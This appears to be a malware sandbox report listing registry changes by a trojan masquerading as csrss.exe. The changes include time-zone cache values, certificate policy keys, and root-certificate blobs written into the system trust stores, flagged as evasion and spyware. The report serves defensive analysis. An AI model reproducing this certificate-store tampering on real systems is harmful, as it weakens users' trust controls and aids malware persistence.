Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
